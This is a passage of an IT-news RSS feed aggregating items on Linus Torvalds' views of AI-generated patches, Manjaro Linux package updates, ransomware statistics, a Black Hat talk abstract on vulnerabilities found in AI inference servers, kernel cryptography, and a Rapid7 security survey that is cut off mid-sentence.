<p>It’s also a good idea to join talent communities in fields of interest and “engage with other members in conversations that increase your knowledge through the collective intelligence of the community,” Morris says. “Take advantage of AI skilling opportunities relevant for your role, or better yet, where you want to go next. Experiment with the technology either on your own or through structured programs.” Ultimately, be curious and proactive, he says.</p>



<p>“I’d also recommend developers not to ignore referrals, direct outreach, and industry-specific communities during job search,” Agarwal says. “There are often a lot more opportunities available than the ones posted online.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Linus Torvalds on AI, Junk Patches, Humans, and Godzilla]]></title>
<description><![CDATA[Linus Torvalds once said LLMs might bring a 10X increase to programmer productivity. But speaking at Open Source Summit India 2026, he now says that number was "not scientific,"
reports ZDNet. "That was pulled out of my ass number, obviously."


Today, he continued, "we're at the point where hope...]]></description>
<link>https://tsecurity.de/de/3663853/it-security-nachrichten/linus-torvalds-on-ai-junk-patches-humans-and-godzilla/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3663853/it-security-nachrichten/linus-torvalds-on-ai-junk-patches-humans-and-godzilla/</guid>
<pubDate>Sun, 12 Jul 2026 23:05:47 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Linus Torvalds once said LLMs might bring a 10X increase to programmer productivity. But speaking at Open Source Summit India 2026, he now says that number was "not scientific,"
reports ZDNet. "That was pulled out of my ass number, obviously."


Today, he continued, "we're at the point where hopefully it creates more productivity than it takes away," but "we certainly saw more junk being generated by LLMs than we saw useful code up until the like early this year.... it can actually be a huge drain on resources when it takes humans a lot of effort to figure out that, hey, this machine-generated report was not true." Even now, he said, "most of the good ones require more than just the LLM," because "we've had to push back quite a bit... if you find a bug with an LLM, it's not enough to just ask the LLM to make a bug report and then throw it over the fence to us. We want to see a suggested patch; we want to see the human who ran the LLM act as a kind of back-and-forth." 

Torvalds described many AI-generated patches as "mindless band-aid kind of patches... they may fix the immediate problem, but the kind of bug remains, and it just is waiting in the hallway to hit you in another place." For his own toy projects, he uses LLMs as prototypers: "I use them as a way to prototype things... quite often the code is not usable in that form, but it's a great way to try something out," while insisting that for kernel-level fixes, "LLMs, in my experience, have not been at that level yet." 

Torvalds acknowledged that some AI-found issues have been "absolutely, stunningly, I mean, interesting in a painful kind of way," especially security problems that "show up in the technology press two days later." Despite the embarrassment, he said, "I'm very much not a shoot-the-messenger kind of person. I think we're much better off with LLMs finding bugs, even when they are embarrassing, and they are things that we should probably have found two decades ago."

 

Torvalds also said he's using AI "for my own toy projects... Every time I travel to some new place, and this is the first time I've been to India, I send the kids pictures of where I am, and for some strange reason, Godzilla seems to follow me around and gets added to those pictures." 

ZDNet notes that Torvalds concluded, "There are many useful and less useful uses for AI," and "I think Godzilla is a great place to stop." 

Thanks to Slashdot reader joshuark for sharing the article.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Linus+Torvalds+on+AI%2C+Junk+Patches%2C+Humans%2C+and+Godzilla%3A+https%3A%2F%2Flinux.slashdot.org%2Fstory%2F26%2F07%2F12%2F2053201%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Flinux.slashdot.org%2Fstory%2F26%2F07%2F12%2F2053201%2Flinus-torvalds-on-ai-junk-patches-humans-and-godzilla%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://linux.slashdot.org/story/26/07/12/2053201/linus-torvalds-on-ai-junk-patches-humans-and-godzilla?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[[Stable Update] 2026-07-11 - Kernels, COSMIC 1.2, Xorg, Firefox, Thunderbird, KDE Gear]]></title>
<description><![CDATA[Hello Manjaro user community, here we have another set of package updates. This also marks the stable release of ‘Bian-May’ - Manjaro 26.1. We will work now on the Release Candidate ISOs to test possible issues before releasing new install medias.
Current Promotions

Get the latest Gaming Laptop ...]]></description>
<link>https://tsecurity.de/de/3660964/unix-server/stable-update-2026-07-11-kernels-cosmic-12-xorg-firefox-thunderbird-kde-gear/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3660964/unix-server/stable-update-2026-07-11-kernels-cosmic-12-xorg-firefox-thunderbird-kde-gear/</guid>
<pubDate>Sat, 11 Jul 2026 01:15:49 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div data-theme-toc="true"> </div>
<p>Hello Manjaro user community, here we have another set of package updates. This also marks the stable release of ‘Bian-May’ - Manjaro 26.1. We will work now on the Release Candidate ISOs to test possible issues before releasing new install medias.</p>
<h3><a name="p-865662-current-promotions-1" class="anchor" href="https://forum.manjaro.org/#p-865662-current-promotions-1" aria-label="Heading link"></a>Current Promotions</h3>
<ul>
<li>Get the latest Gaming Laptop by Slimbook powered by Manjaro: <a href="https://slimbook.com/manjaro">Slimbook Manjaro III</a></li>
<li>Protect your personal data, keep yourself safe with Surfshark VPN: <a href="https://get.surfshark.net/aff_c?offer_id=6&amp;aff_id=14558-">See current promotion</a></li>
</ul>
<h2><a name="p-865662-recent-news-2" class="anchor" href="https://forum.manjaro.org/#p-865662-recent-news-2" aria-label="Heading link"></a>Recent News</h2>

New in Manjaro GNOME!
Or, if you prefer the command line: <a href="https://forum.manjaro.org/t/stable-update-2026-07-11-kernels-cosmic-1-2-xorg-firefox-thunderbird-kde-gear/188902/1">(click for more details)</a>

KDE Plasma users with SDDM can now migrate to Plasma Login Manager <a href="https://forum.manjaro.org/t/stable-update-2026-07-11-kernels-cosmic-1-2-xorg-firefox-thunderbird-kde-gear/188902/1">(click for more details)</a>

NVIDIA 590 driver drops Pascal support <a href="https://forum.manjaro.org/t/stable-update-2026-07-11-kernels-cosmic-1-2-xorg-firefox-thunderbird-kde-gear/188902/1">(click for more details)</a>
<ul>
<li><a href="https://forum.manjaro.org/t/manjaro-26-1-bian-may-preview-released/187389" class="inline-onebox">Manjaro 26.1 Bian-May - Preview released</a></li>
<li><a href="https://forum.manjaro.org/t/manjaro-26-0-anh-linh-released/184526" class="inline-onebox">Manjaro 26.0 Anh-Linh released</a></li>
<li><a href="https://forum.manjaro.org/t/manjaro-summit-public-alpha-now-available/176995" class="inline-onebox">Manjaro Summit public Alpha now available</a></li>
<li>As of Linux 5.4.302, the 5.4 series is now EOL (End Of Life). Please install 5.10 LTS (Long Term Support) or 5.15 LTS.</li>
<li>As of Linux 6.16.12, the 6.16 series is now EOL (End Of Life). Please install 6.18 LTS (Long Term Support) and/or 6.12 LTS.</li>
<li>As of Linux 6.17.13, the 6.17 series is now EOL (End Of Life). Please install 6.18 LTS (Long Term Support) and/or 6.12 LTS.</li>
<li>As of Linux 6.19.14, the 6.19 series is now EOL (End Of Life). Please install 7.0, and/or 6.18 LTS (Long Term Support) and/or 6.12 LTS.</li>
<li>As of Linux 7.0.14, the 7.0 series is now EOL (End Of Life). Please install 7.1, and/or 6.18 LTS (Long Term Support) and/or 6.12 LTS.</li>
</ul>

Previous News <a href="https://forum.manjaro.org/t/stable-update-2026-07-11-kernels-cosmic-1-2-xorg-firefox-thunderbird-kde-gear/188902/1">(click for more details)</a>
<h2><a name="p-865662-notable-package-updates-3" class="anchor" href="https://forum.manjaro.org/#p-865662-notable-package-updates-3" aria-label="Heading link"></a>Notable Package Updates</h2>
<ul>
<li><strong>Kernels</strong> got updated
<ul>
<li><strong>linux70</strong> got removed from our repos</li>
<li><strong>linux-firmware</strong> <a href="https://gitlab.com/kernel-firmware/linux-firmware/-/compare/20260519...20260622?from_project_id=48890189">20260622</a></li>
<li>slight <strong>toolchain</strong> update</li>
<li><strong>NVIDIA</strong> <a href="https://www.nvidia.com/en-us/drivers/details/274183/">610.43.03</a></li>
<li>we dropped <strong>NVIDIA</strong> driver series 570xx and 575xx</li>
</ul>
</li>
<li><strong>Firefox</strong> <a href="https://www.firefox.com/en-US/firefox/152.0.4/releasenotes/">152.0.4</a></li>
<li><strong>Thunderbird</strong> <a href="https://www.thunderbird.net/en-US/thunderbird/152.0/releasenotes">152.0</a></li>
<li><strong>Virtualbox</strong> <a href="https://www.virtualbox.org/wiki/Changelog-7.2">7.2.12</a></li>
<li><strong>Godot</strong> <a href="https://godotengine.org/releases/4.7/">4.7</a></li>
<li><strong>Pipewire</strong> <a href="https://gitlab.freedesktop.org/pipewire/pipewire/-/releases/1.6.7">1.6.7</a></li>
<li><strong>Systemd</strong> <a href="https://github.com/systemd/systemd/compare/v260.2...v261.1">261.1</a></li>
<li><strong>COSMIC</strong> Epoch <a href="https://github.com/pop-os/cosmic-epoch/releases/tag/epoch-1.2.0">1.2.0</a></li>
<li><strong>Plasma</strong> <a href="https://kde.org/announcements/plasma/6/6.6.6/">6.6.6</a></li>
<li><strong>KDE Gear</strong> <a href="https://kde.org/announcements/gear/26.04.3/">26.04.3</a></li>
<li><strong>QEmu</strong> <a href="https://www.qemu.org/2026/04/22/qemu-11-0-0/">11.0.2</a></li>
<li><strong>Firefox</strong> <a href="https://www.firefox.com/en-US/firefox/152.0.5/releasenotes/">152.0.5</a></li>
<li><strong>Xorg-Server</strong> <a href="https://lists.x.org/archives/xorg-announce/2026-July/003718.html">21.1.24</a></li>
<li><strong>XWayland</strong> <a href="https://lists.x.org/archives/xorg-announce/2026-July/003717.html">24.1.13</a></li>
<li><strong>OpenSearch</strong> <a href="https://opensearch.org/blog/explore-opensearch-3-7/">3.7.0</a></li>
</ul>
<h2><a name="p-865662-additional-info-4" class="anchor" href="https://forum.manjaro.org/#p-865662-additional-info-4" aria-label="Heading link"></a>Additional Info</h2>

Python 3.14 info <a href="https://forum.manjaro.org/t/stable-update-2026-07-11-kernels-cosmic-1-2-xorg-firefox-thunderbird-kde-gear/188902/1">(click for more details)</a>

Info about AUR packages <a href="https://forum.manjaro.org/t/stable-update-2026-07-11-kernels-cosmic-1-2-xorg-firefox-thunderbird-kde-gear/188902/1">(click for more details)</a>
<p>Get our latest daily developer images now from Github: <a href="https://github.com/manjaro-plasma/download/releases">Plasma</a>, <a href="https://github.com/manjaro-gnome/download/releases">GNOME</a>, <a href="https://github.com/manjaro-xfce/download/releases">XFCE</a>. You can get the latest <a href="https://manjaro.org/download">stable releases</a> of Manjaro from <a href="https://cdn77.com/">CDN77</a>.</p>
<hr>
<p><strong>Our current supported kernels</strong></p>
<ul>
<li>linux61 6.1.177</li>
<li>linux66 6.6.144</li>
<li>linux612 6.12.95</li>
<li>linux618 6.18.38</li>
<li>linux71 7.1.3</li>
<li>linux72 7.2.0-rc2</li>
<li>linux61-rt 6.1.167_rt62</li>
<li>linux66-rt 6.6.135_rt74</li>
<li>linux612-rt 6.12.89_rt18</li>
</ul>
<p><strong>Package Changes</strong> (7/9/26 07:43 CEST)</p>
<ul>
<li>stable core x86_64:  121 new and 122 removed package(s)</li>
<li>stable extra x86_64:  4021 new and 4169 removed package(s)</li>
<li>stable multilib x86_64:  65 new and 70 removed package(s)</li>
</ul>
<p>A list of all package changes can be found <a href="https://gitlab.manjaro.org/-/snippets/1205/raw">here</a>.</p>
<p><a href="https://forum.manjaro.org/t/stable-update-2026-07-11-kernels-cosmic-1-2-xorg-firefox-thunderbird-kde-gear/188902/1">Click to view the poll.</a></p>
<p>Check if your mirror has already synced:</p>
<ul>
<li><a href="https://repo.manjaro.org/">Mirror-Check Service</a></li>
</ul>
<hr>
            <p><small>3 posts - 2 participants</small></p>
            <p><a href="https://forum.manjaro.org/t/stable-update-2026-07-11-kernels-cosmic-1-2-xorg-firefox-thunderbird-kde-gear/188902">Read full topic</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Robot Dogs, Teslas, and Rescue Helicopters: The UN AI Summit Was a Lot]]></title>
<description><![CDATA[Amid live coding sessions and Silicon Valley optimism, the UN’s AI for Good summit wrestled with an increasingly urgent question: Can global governance catch up before the technology races beyond its control?]]></description>
<link>https://tsecurity.de/de/3658848/it-nachrichten/robot-dogs-teslas-and-rescue-helicopters-the-un-ai-summit-was-a-lot/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3658848/it-nachrichten/robot-dogs-teslas-and-rescue-helicopters-the-un-ai-summit-was-a-lot/</guid>
<pubDate>Fri, 10 Jul 2026 08:02:30 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Amid live coding sessions and Silicon Valley optimism, the UN’s AI for Good summit wrestled with an increasingly urgent question: Can global governance catch up before the technology races beyond its control?]]></content:encoded>
</item>
<item>
<title><![CDATA[A New Ransomware Leader Emerges as June 2026 Attack Volumes Climb Worldwide]]></title>
<description><![CDATA[Key takeaways Weekly cyber-attacks per organization reached 2,270 in June 2026, up 10% from May and 17% higher than June 2025 Education, Government, and Telecommunications again sat at the top of the industry list, with Education and Telecommunications posting double-digit…
Read more →
The post A...]]></description>
<link>https://tsecurity.de/de/3657211/it-security-nachrichten/a-new-ransomware-leader-emerges-as-june-2026-attack-volumes-climb-worldwide/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3657211/it-security-nachrichten/a-new-ransomware-leader-emerges-as-june-2026-attack-volumes-climb-worldwide/</guid>
<pubDate>Thu, 09 Jul 2026 15:38:27 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Key takeaways Weekly cyber-attacks per organization reached 2,270 in June 2026, up 10% from May and 17% higher than June 2025 Education, Government, and Telecommunications again sat at the top of the industry list, with Education and Telecommunications posting double-digit…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/a-new-ransomware-leader-emerges-as-june-2026-attack-volumes-climb-worldwide/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/a-new-ransomware-leader-emerges-as-june-2026-attack-volumes-climb-worldwide/">A New Ransomware Leader Emerges as June 2026 Attack Volumes Climb Worldwide</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[A New Ransomware Leader Emerges as June 2026 Attack Volumes Climb Worldwide]]></title>
<description><![CDATA[Key takeaways Weekly cyber-attacks per organization reached 2,270 in June 2026, up 10% from May and 17% higher than June 2025 Education, Government, and Telecommunications again sat at the top of the industry list, with Education and Telecommunications posting double-digit gains while Government ...]]></description>
<link>https://tsecurity.de/de/3657171/it-security-nachrichten/a-new-ransomware-leader-emerges-as-june-2026-attack-volumes-climb-worldwide/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3657171/it-security-nachrichten/a-new-ransomware-leader-emerges-as-june-2026-attack-volumes-climb-worldwide/</guid>
<pubDate>Thu, 09 Jul 2026 15:24:04 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img width="1600" height="800" src="https://blog.checkpoint.com/wp-content/uploads/2026/01/Blog-banner-800x400_1.png" class="webfeedsFeaturedVisual wp-post-image" alt="" link_thumbnail="" decoding="async" fetchpriority="high" srcset="https://blog.checkpoint.com/wp-content/uploads/2026/01/Blog-banner-800x400_1.png 1600w, https://blog.checkpoint.com/wp-content/uploads/2026/01/Blog-banner-800x400_1-300x150.png 300w, https://blog.checkpoint.com/wp-content/uploads/2026/01/Blog-banner-800x400_1-1024x512.png 1024w, https://blog.checkpoint.com/wp-content/uploads/2026/01/Blog-banner-800x400_1-768x384.png 768w, https://blog.checkpoint.com/wp-content/uploads/2026/01/Blog-banner-800x400_1-1536x768.png 1536w, https://blog.checkpoint.com/wp-content/uploads/2026/01/Blog-banner-800x400_1-400x200.png 400w, https://blog.checkpoint.com/wp-content/uploads/2026/01/Blog-banner-800x400_1-600x300.png 600w, https://blog.checkpoint.com/wp-content/uploads/2026/01/Blog-banner-800x400_1-800x400.png 800w, https://blog.checkpoint.com/wp-content/uploads/2026/01/Blog-banner-800x400_1-1200x600.png 1200w, https://blog.checkpoint.com/wp-content/uploads/2026/01/Blog-banner-800x400_1-1320x660.png 1320w" sizes="(max-width: 1600px) 100vw, 1600px"><p>Key takeaways Weekly cyber-attacks per organization reached 2,270 in June 2026, up 10% from May and 17% higher than June 2025 Education, Government, and Telecommunications again sat at the top of the industry list, with Education and Telecommunications posting double-digit gains while Government rose 5% year over year Most regions grew year over year, led by Latin America at a 27% increase, while Africa was the exception with a 9% decline GenAI exposure held roughly steady, though Healthcare and Telecommunications emerged as the industries carrying the most risk from unsafe prompts Ransomware attacks reached 646 for the month, a 33% […]</p>
<p>The post <a href="https://blog.checkpoint.com/research/a-new-ransomware-leader-emerges-as-june-2026-attack-volumes-climb-worldwide/">A New Ransomware Leader Emerges as June 2026 Attack Volumes Climb Worldwide</a> appeared first on <a href="https://blog.checkpoint.com/">Check Point Blog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[[Testing Update] 2026-07-09 - Kernels, Firefox, Xorg-Server, XWayland, Bluez, OpenSearch]]></title>
<description><![CDATA[Hello Manjaro user community, here we have another set of package updates. We are continuing our development of the upcoming release of ‘Bian-May’ which can be expected Mid or End of July. Development speed may be a little slower the upcoming weeks. However, still let us know any issues you may f...]]></description>
<link>https://tsecurity.de/de/3656141/unix-server/testing-update-2026-07-09-kernels-firefox-xorg-server-xwayland-bluez-opensearch/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3656141/unix-server/testing-update-2026-07-09-kernels-firefox-xorg-server-xwayland-bluez-opensearch/</guid>
<pubDate>Thu, 09 Jul 2026 08:30:53 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div data-theme-toc="true"> </div>
<p>Hello Manjaro user community, here we have another set of package updates. We are continuing our development of the upcoming release of ‘Bian-May’ which can be expected Mid or End of July. Development speed may be a little slower the upcoming weeks. However, still let us know any issues you may found thus far.</p>
<h3><a name="p-865333-current-promotions-1" class="anchor" href="https://forum.manjaro.org/#p-865333-current-promotions-1" aria-label="Heading link"></a>Current Promotions</h3>
<ul>
<li>Get the latest Gaming Laptop by Slimbook powered by Manjaro: <a href="https://slimbook.com/manjaro">Slimbook Manjaro III</a></li>
<li>Protect your personal data, keep yourself safe with Surfshark VPN: <a href="https://get.surfshark.net/aff_c?offer_id=6&amp;aff_id=14558-">See current promotion</a></li>
</ul>
<h2><a name="p-865333-recent-news-2" class="anchor" href="https://forum.manjaro.org/#p-865333-recent-news-2" aria-label="Heading link"></a>Recent News</h2>

New in Manjaro GNOME!
Or, if you prefer the command line: <a href="https://forum.manjaro.org/t/testing-update-2026-07-09-kernels-firefox-xorg-server-xwayland-bluez-opensearch/188865/1">(click for more details)</a>

KDE Plasma users with SDDM can now migrate to Plasma Login Manager <a href="https://forum.manjaro.org/t/testing-update-2026-07-09-kernels-firefox-xorg-server-xwayland-bluez-opensearch/188865/1">(click for more details)</a>

NVIDIA 590 driver drops Pascal support <a href="https://forum.manjaro.org/t/testing-update-2026-07-09-kernels-firefox-xorg-server-xwayland-bluez-opensearch/188865/1">(click for more details)</a>
<ul>
<li><a href="https://forum.manjaro.org/t/manjaro-26-1-bian-may-preview-released/187389" class="inline-onebox">Manjaro 26.1 Bian-May - Preview released</a></li>
<li><a href="https://forum.manjaro.org/t/manjaro-26-0-anh-linh-released/184526" class="inline-onebox">Manjaro 26.0 Anh-Linh released</a></li>
<li><a href="https://forum.manjaro.org/t/manjaro-summit-public-alpha-now-available/176995" class="inline-onebox">Manjaro Summit public Alpha now available</a></li>
<li>As of Linux 5.4.302, the 5.4 series is now EOL (End Of Life). Please install 5.10 LTS (Long Term Support) or 5.15 LTS.</li>
<li>As of Linux 6.16.12, the 6.16 series is now EOL (End Of Life). Please install 6.18 LTS (Long Term Support) and/or 6.12 LTS.</li>
<li>As of Linux 6.17.13, the 6.17 series is now EOL (End Of Life). Please install 6.18 LTS (Long Term Support) and/or 6.12 LTS.</li>
<li>As of Linux 6.19.14, the 6.19 series is now EOL (End Of Life). Please install 7.0, and/or 6.18 LTS (Long Term Support) and/or 6.12 LTS.</li>
<li>As of Linux 7.0.14, the 7.0 series is now EOL (End Of Life). Please install 7.1, and/or 6.18 LTS (Long Term Support) and/or 6.12 LTS.</li>
</ul>

Previous News <a href="https://forum.manjaro.org/t/testing-update-2026-07-09-kernels-firefox-xorg-server-xwayland-bluez-opensearch/188865/1">(click for more details)</a>
<h2><a name="p-865333-notable-package-updates-3" class="anchor" href="https://forum.manjaro.org/#p-865333-notable-package-updates-3" aria-label="Heading link"></a>Notable Package Updates</h2>
<ul>
<li><strong>Kernels</strong> got updated
<ul>
<li><strong>linux70</strong> got removed from our repos</li>
<li><strong>NVIDIA</strong> <a href="https://www.nvidia.com/en-us/drivers/details/274183/">610.43.03</a></li>
</ul>
</li>
<li><strong>Firefox</strong> <a href="https://www.firefox.com/en-US/firefox/152.0.5/releasenotes/">152.0.5</a></li>
<li><strong>Xorg-Server</strong> <a href="https://lists.x.org/archives/xorg-announce/2026-July/003718.html">21.1.24</a></li>
<li><strong>XWayland</strong> <a href="https://lists.x.org/archives/xorg-announce/2026-July/003717.html">24.1.13</a></li>
<li><strong>Bluez</strong> <a href="https://github.com/bluez/bluez/releases/tag/5.87">5.87</a></li>
<li><strong>OpenSearch</strong> <a href="https://opensearch.org/blog/explore-opensearch-3-7/">3.7.0</a></li>
</ul>
<h2><a name="p-865333-additional-info-4" class="anchor" href="https://forum.manjaro.org/#p-865333-additional-info-4" aria-label="Heading link"></a>Additional Info</h2>

Python 3.14 info <a href="https://forum.manjaro.org/t/testing-update-2026-07-09-kernels-firefox-xorg-server-xwayland-bluez-opensearch/188865/1">(click for more details)</a>

Info about AUR packages <a href="https://forum.manjaro.org/t/testing-update-2026-07-09-kernels-firefox-xorg-server-xwayland-bluez-opensearch/188865/1">(click for more details)</a>
<p>Get our latest daily developer images now from Github: <a href="https://github.com/manjaro-plasma/download/releases">Plasma</a>, <a href="https://github.com/manjaro-gnome/download/releases">GNOME</a>, <a href="https://github.com/manjaro-xfce/download/releases">XFCE</a>. You can get the latest <a href="https://manjaro.org/download">stable releases</a> of Manjaro from <a href="https://cdn77.com/">CDN77</a>.</p>
<hr>
<p><strong>Our current supported kernels</strong></p>
<ul>
<li>linux61 6.1.177</li>
<li>linux66 6.6.144</li>
<li>linux612 6.12.95</li>
<li>linux618 6.18.38</li>
<li>linux71 7.1.3</li>
<li>linux72 7.2.0-rc2</li>
<li>linux61-rt 6.1.167_rt62</li>
<li>linux66-rt 6.6.135_rt74</li>
<li>linux612-rt 6.12.89_rt18</li>
</ul>
<p><strong>Package Changes</strong> (7/9/26 07:43 CEST)</p>
<ul>
<li>testing core x86_64:  6 new and 6 removed package(s)</li>
<li>testing extra x86_64:  863 new and 858 removed package(s)</li>
<li>testing multilib x86_64:  7 new and 8 removed package(s)</li>
</ul>
<p><strong>Overlay Changes</strong></p>
<ul>
<li>testing core x86_64:  15 new and 17 removed package(s)</li>
<li>testing extra x86_64:  126 new and 142 removed package(s)</li>
<li>testing multilib x86_64:  2 new and 2 removed package(s)</li>
</ul>
<p>A list of all package changes can be found <a href="https://termbin.com/3dw2">here</a>.</p>
<p><a href="https://forum.manjaro.org/t/testing-update-2026-07-09-kernels-firefox-xorg-server-xwayland-bluez-opensearch/188865/1">Click to view the poll.</a></p>
<p>Check if your mirror has already synced:</p>
<ul>
<li><a href="https://repo.manjaro.org/">Mirror-Check Service</a></li>
</ul>
<hr>
            <p><small>2 posts - 2 participants</small></p>
            <p><a href="https://forum.manjaro.org/t/testing-update-2026-07-09-kernels-firefox-xorg-server-xwayland-bluez-opensearch/188865">Read full topic</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA['I'm not a programmer' anymore: Linus Torvalds on the only two tools he uses now]]></title>
<description><![CDATA[At the Open Source Summit in Mumbai, Torvalds discusses the pain and power of AI in the kernel, and why Linux no longer supports 'museum' technology.]]></description>
<link>https://tsecurity.de/de/3655473/it-nachrichten/im-not-a-programmer-anymore-linus-torvalds-on-the-only-two-tools-he-uses-now/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3655473/it-nachrichten/im-not-a-programmer-anymore-linus-torvalds-on-the-only-two-tools-he-uses-now/</guid>
<pubDate>Wed, 08 Jul 2026 23:17:38 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[At the Open Source Summit in Mumbai, Torvalds discusses the pain and power of AI in the kernel, and why Linux no longer supports 'museum' technology.]]></content:encoded>
</item>
<item>
<title><![CDATA[Black Hat Europe 2025 | Breaking AI Inference Systems: Lessons From Pwn2Own Berlin]]></title>
<description><![CDATA[Author: Black Hat - Bewertung: 0x - Views:0 At Pwn2Own Berlin 2025, AI systems made their debut as official competition targets. This talk documents our successful exploitation of real-world AI infrastructure in that context focusing on vulnerabilities we discovered and demonstrated in Ollama and...]]></description>
<link>https://tsecurity.de/de/3654668/it-security-video/black-hat-europe-2025-breaking-ai-inference-systems-lessons-from-pwn2own-berlin/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3654668/it-security-video/black-hat-europe-2025-breaking-ai-inference-systems-lessons-from-pwn2own-berlin/</guid>
<pubDate>Wed, 08 Jul 2026 16:47:37 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Black Hat - Bewertung: 0x - Views:0 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/Qy1Uu5Wdkg8?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>At Pwn2Own Berlin 2025, AI systems made their debut as official competition targets. This talk documents our successful exploitation of real-world AI infrastructure in that context focusing on vulnerabilities we discovered and demonstrated in Ollama and NVIDIA Triton Inference Server.<br />
<br />
We detail our security research methodology, which included threat modeling, file format fuzzing, and plugin analysis. In Ollama, we discovered multiple bugs before and during the competition, including an authentication bypass (CVE issued) and a heap overflow found via fuzzing—although it was patched three weeks before the event. In Triton Server, we uncovered a command injection vulnerability in its model configuration pipeline, leading to reliable remote code execution.<br />
<br />
We'll also briefly explore other AI targets such as RedisAI, ChromaDB, and NVIDIA's container runtime, including insight into a potential stack overflow rediscovery via fuzzing.<br />
<br />
This session blends concrete technical details with broader insight, sharing actionable takeaways for red teamers and defenders working with inference systems. Attendees will leave with a solid understanding of how to audit, attack, and better defend AI model infrastructure.<br />
<br />
By: <br />
Patrick Ventuzelo  |  CEO & Founder, Fuzzinglabs<br />
Nabih Benazzouz  |  COO, Fuzzinglabs<br />
<br />
https://blackhat.com/eu-25/briefings/schedule/?#breaking-ai-inference-systems-lessons-from-pwn2own-berlin-48948<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[[$] Progress in modernizing kernel cryptography]]></title>
<description><![CDATA[At the 2026 Linux Security Summit North America, Eric Biggers spoke about
some of the problems with the kernel's cryptography framework, as well
as the recent progress in adding library APIs to allow developers to
use cryptographic functions without using the traditional crypto
API. He walked thr...]]></description>
<link>https://tsecurity.de/de/3654448/linux-tipps/progress-in-modernizing-kernel-cryptography/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3654448/linux-tipps/progress-in-modernizing-kernel-cryptography/</guid>
<pubDate>Wed, 08 Jul 2026 15:25:12 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>At the 2026 <a href="https://events.linuxfoundation.org/linux-security-summit-north-america/">Linux Security Summit North America</a>, Eric Biggers spoke about
some of the problems with the kernel's cryptography framework, as well
as the recent progress in adding library APIs to allow developers to
use cryptographic functions without using the traditional crypto
API. He walked through a couple of examples to demonstrate the
frailty of the original API and showed how the new library API made
life easier for developers and kernel maintainers.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security Teams Are Ready To Become More Preemptive. What’s Holding Them Back?]]></title>
<description><![CDATA[The shift toward preemptive security is underway, but most organizations are still navigating the realities of limited resources, fragmented tools, and emerging AI risk. At Rapid7’s recent Global Security Summit, we surveyed attendees to better understand where security leaders and practitioners ...]]></description>
<link>https://tsecurity.de/de/3654445/it-security-nachrichten/security-teams-are-ready-to-become-more-preemptive-whats-holding-them-back/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3654445/it-security-nachrichten/security-teams-are-ready-to-become-more-preemptive-whats-holding-them-back/</guid>
<pubDate>Wed, 08 Jul 2026 15:23:58 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><span>The shift toward preemptive security is underway, but most organizations are still navigating the realities of limited resources, fragmented tools, and emerging AI risk. At Rapid7’s recent </span><a href="https://rapid7.brighttalk.com/?utm_source=blog&amp;utm_medium=website&amp;utm_content=survey-blog&amp;utm_campaign=global-mdr-2026-global-virtual-summit-prospect-eng-nom-25" target="_blank"><span>Global Security Summit</span></a><span>, we surveyed attendees to better understand where security leaders and practitioners stand today, what is shaping their priorities, and what they need to move forward. Their responses offer a candid view into the current state of security operations: ambitious, increasingly AI-aware, and ready for change, but still working through the practical challenges of getting there.</span></p><p><span>For many teams, the direction is clear: security needs to become more proactive, more connected, and more resilient. Attackers are moving quickly, environments are expanding, and teams are under pressure to reduce risk before it turns into business disruption. But the survey results show that most organizations are still somewhere in the middle of that journey.</span></p><h2>Where organizations are today</h2><p><span>One of the clearest findings is that security operations are increasingly collaborative. According to the survey, 57% of respondents operate in a hybrid internal and 